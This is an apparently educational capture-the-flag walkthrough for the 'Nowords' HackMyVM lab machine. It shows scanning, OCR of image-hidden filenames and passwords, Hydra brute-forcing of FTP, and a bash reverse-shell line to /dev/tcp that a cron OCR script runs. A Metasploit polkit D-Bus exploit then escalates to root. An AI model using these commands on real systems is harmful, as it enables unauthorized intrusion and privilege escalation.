Nowords by Sml
00. Metainfo
| Title: | Nowords |
| Author: | Sml |
| Released: | 2021-07-02 |
| Download from: | HackMyVM |
| Level: | Medium |
| System: | Linux |
| You’ll learn: | OCR, Ubuntu Gnome |
01. Metasploit and scan
msf6 > db_nmap -A -T4 -p- 172.16.1.114
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-28 20:01 CEST
[*] Nmap: Nmap scan report for nowords.lan (172.16.1.114)
[*] Nmap: Host is up (0.00041s latency).
[*] Nmap: Not shown: 65533 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 3.0.3
[*] Nmap: 80/tcp open http nginx 1.18.0 (Ubuntu)
[*] Nmap: |_http-server-header: nginx/1.18.0 (Ubuntu)
[*] Nmap: |_http-title: Site doesn't have a title (text/html).
[*] Nmap: MAC Address: 9A:68:E0:FE:B3:4D (Unknown)
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.91%E=4%D=9/28%OT=21%CT=1%CU=38202%PV=Y%DS=1%DC=D%G=Y%M=9A68E0%T
[*] Nmap: OS:M=6153587B%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=100%TI=Z%CI=Z%II=I
[*] Nmap: OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
[*] Nmap: OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
[*] Nmap: OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
[*] Nmap: OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
[*] Nmap: OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
[*] Nmap: OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
[*] Nmap: OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
[*] Nmap: OS:N%T=40%CD=S)
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 0.41 ms nowords.lan (172.16.1.114)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 23.24 seconds
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.1.114 21 tcp ftp open vsftpd 3.0.3
172.16.1.114 80 tcp http open nginx 1.18.0 Ubuntu
msf6 >
As we can see, we only have 2 ports open. There is only FTP and HTTP. There is no SSH.
02. FTP
There is no access to anonymous users on this FTP.
03. Ffuf
Let’s check what files are on the server on the HTTP service.
# ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://172.16.1.114/FUZZ -e .jpg,.php,.txt,.html,png
We found the robots.txt file. This is not a text file. Let’s check it.
# file robots.txt
robots.txt.png: PNG image data, 356 x 649, 8-bit/color RGBA, non-interlaced
robots.txt (robots.txt.png)
We see the picture with the text on it. Let’s turn it into a text file.
04. OCR and similiar stuff
# cp robots.txt robots.txt.png
# gocr -i robots.txt.png -C '1-9a-z/' -u '?' > real.robots.txt
O is similar to o, so let’s drop the o checking, then we’ll fix it manually, and later let’s drop the / from the beginning of the line.
# cat real.robots.txt | tr -d '/' > filenames.txt
We’ll see something like this:
filenames.txt
ewqpoiewopqiewq 490382490328423 fdsnmrewrwerew uoijfdsijiofds rewjlkjsdf rwen908098vcxvcx kvjciovcuxioufhydsfdsyr klvcxhyvcxkljhyvcxiuzxcioyv oiufdsaoifndasuiofhdsa klhvcoixzuyvxcizoyvzxcuiyv pvycuxivhyzxcuivyzxiouvyzxc kifjdsaoipfuasoifjasipofudas oidfphkljerhwqlkjrheqwkjlh mncvmzxoiurewqioyrwqrewqrr oiupoiuopiuopiuioyuiyiuyio ghasfdhasfdhasdghasfdhgasfdasjf nbvnmvnbvnmzxvncvznbxcvznvzx vnbewqveqwbmvenqwbvrnwevrhjwefhjoerj hvuixctyvcyuxgivxcyuvfxcyuvigfxc uihysaidouyasiudysquidhqiuodhqiudqhiodu hfdsioufhdsiuhvcxiuovyhcxiuvgxcivhcxbcviux vhsdiufyhdsuivhxcuivhuisdhfids jfd9s87fds89cvxyvxc789v6cx m98789789ds7a89d7sah98zxc78 dsaknewiquiodusjadsa vcxjhkluioyfdsrew vcxoiufdsnkjnewq iouoiuvcxvcxfds uoihbnnmxcbmxcnbvx mdsaydqnfdsoiurewnh ioufdosijnmieoryu oiufdsnrewjhuiyfsd rewnkvoiuxvfdsfdsrwqe kuviosjdfiojdsifoyuewhq hvioxcuyiofuasdhfkjlsnafoidsy
05. Ffuf again
Let’s check if the file names are on the page:
# ffuf -w filenames.txt -u http://172.16.1.114/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://172.16.1.114/FUZZ
:: Wordlist : FUZZ: filenames.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
oiufdsnrewjhuiyfsd [Status: 200, Size: 58506, Words: 215, Lines: 211]
:: Progress: [35/35] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
#----------------------
We found the oiufdsnrewjhuiyfsd file. It’s a JPG file. Here we see names, i.e. logins, possibly passwords:
oiufdsnrewjhuiyfsd
On the main page in the source, there was a hint that usernames and passwords contain only lowercase characters. Let’s go over it all:
view-source:http://172.16.1.114
Hint inside. <!-- [usernames and passwords are lowercase] -->
Let’s recognize it. But be careful. You will have to correct some words manually.
# gocr -i oiufdsnrewjhuiyfsd.jpg -C 'a-zA-Z' > oiufdsnrewjhuiyfsd.txt
# cat oiufdsnrewjhuiyfsd.txt | tr '[[:upper:]]' '[[:lower:]]' | awk {'print $1"\n"$2"\n"$3}' > loginpass.txt
the file loginpass.txt should look like this:
loginpass.txt
quinn brielle mary nevaeh delilah athena piper isla andrea ruby rylee leilani serenity katherine jasmine willow sophie lyla everly josephine margaret cora ivy alyssa kaylee liliana adalyn lydia jade arya aubree maria norah arianna taylor khloe eliana hadley kayla peyton kylie eden melanie emery eliza gianna adalynn rose isabelle natalia ariel julia annabelle melody valentina faith alexis nova alexandra isabel clara ximena sydney vivian ashley juliana reagan brianna lauren mackenzie raelynn iris madeline bailey emerson
06. Hydra
Let’s check if the login and password match to connect to FTP. Probably user is sophie. You could see it on login screen, but check all.
# hydra -t 16 -V -L loginpass.txt -P loginpass.txt -u ftp://172.16.1.114 -o pass4ftp.txt
Hydra found login and pass. Login is sophie 
07. FTP again
By accessing FTP, we have access to the entire disk. but we have two interesting files in our directory.
-rw------- 1 1000 1000 2114 Sep 27 20:29 command.jpg
-rw-rw-r-- 1 1000 1000 42 Sep 28 21:46 log.txt
You may notice that the date of the log.txt file changes every minute. Going to the directory /home/me we find the cause of this confusion. It’s a file doit.py
ncftp /home/me > ls -la
drwxrwxrwx 2 0 0 4096 Sep 27 22:25 .
drwxr-xr-x 4 0 0 4096 Jul 02 15:35 ..
-rwxrwxrwx 1 1000 1000 509 Jul 02 15:36 doit.py
-rwxrwxrwx 1 0 0 13 Jul 02 15:35 user.txt
Let’s see its code:
ncftp /home/me > cat doit.py
#!/usr/bin/python3
# coding: utf-8
import pytesseract
import os
try:
import Image, ImageOps, ImageEnhance, imread
except ImportError:
from PIL import Image, ImageOps, ImageEnhance
def solve_captcha(path):
captcha = pytesseract.image_to_string(Image.open(path))
return captcha
if __name__ == '__main__':
text = solve_captcha("/home/userdirectory/command.jpg")
a = text.split("\n")
f = open("/home/userdirectory/log.txt","w")
f.write(" Executing: "+text)
f.close()
os.system(a[0])
The doit.py script reads the command.jpg image and converts it to text. A word of caution, I recommend using the Consolas fonts when you will create text on the image. Other fonts can be problematic in recognizing characters. Keep in mind, that command.jpg is real .png image not .jpeg. At first, I wanted to type the entire command into a picture, but there was a problem with letter recognition.
So I typed a short command and additionally uploaded the script.sh to the FTP server.
ncftp /home/me > cat script.sh
bash -i > /dev/tcp/172.16.1.10/4444 2>&1 0>&1
ncftp /home/me >
08. Metasploit and Shell
In the next window, we turned on Metasploit and launched the connection handling module.
msf6 > resource 1.rc
[*] Processing /home/szikers/nowords/1.rc for ERB directives.
resource (/home/szikers/nowords/1.rc)> use exploit/multi/handler
[*] Using configured payload linux/x86/shell_reverse_tcp
resource (/home/szikers/nowords/1.rc)> set lport 4444
lport => 4444
resource (/home/szikers/nowords/1.rc)> set lhost eth0
lhost => eth0
resource (/home/szikers/nowords/1.rc)> set payload payload/linux/x64/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 172.16.1.10:4444
msf6 exploit(multi/handler) > jobs
After a minute we had access to the shell:
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler linux/x86/shell_reverse_tcp tcp://172.16.1.10:4444
msf6 exploit(multi/handler) > [*] Command shell session 1 opened (172.16.1.10:4444 -> 172.16.1.114:57484) at 2021-09-28 23:31:08 +0200
09. Exploit and root
First you need to upgrade session. Better works with exploit:
msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.1.10:4433
[*] Sending stage (984904 bytes) to 172.16.1.114
[*] Meterpreter session 2 opened (172.16.1.10:4433 -> 172.16.1.114:36826) at 2021-09-29 03:40:43 +0200
Remember, it may fail the first time, but don’t be discouraged, try.
Let’s exploit
msf6 > use linux/local/polkit_dbus_auth_bypass
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set lport 4567
lport => 4567
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set iterations 400
iterations => 400
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set username
set username
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set username kerszi
username => kerszi
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set password szikers
password => szikers
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set session 2
session => 2
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run
[*] Started reverse TCP handler on 172.16.1.10:4567
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking for exploitability via attempt
[+] The target is vulnerable. The polkit framework instance is vulnerable.
[*] Attempting to create user kerszi
[+] User kerszi created with UID 1001
[*] Attempting to set the password of the newly created user, kerszi, to: szikers
[+] Obtained code execution as root!
[*] Writing '/tmp/BXiNu' (207 bytes) ...
[*] Sending stage (984904 bytes) to 172.16.1.114
[*] Attempting to remove the user added:
[+] Deleted /tmp/BXiNu
[+] Successfully removed kerszi
[*] Meterpreter session 4 opened (172.16.1.10:4567 -> 172.16.1.114:52288) at 2021-09-29 03:47:29 +0200
meterpreter > getuid
Server username: root @ nowords (uid=0, gid=0, euid=0, egid=0)
Video about Polkit D-Bus Authentication Bypass you can see here:
10. The end
Sorry 4 my English. Mainly I used translator. If you like it write to kerszi@protonmail.com
Zostaw komentarz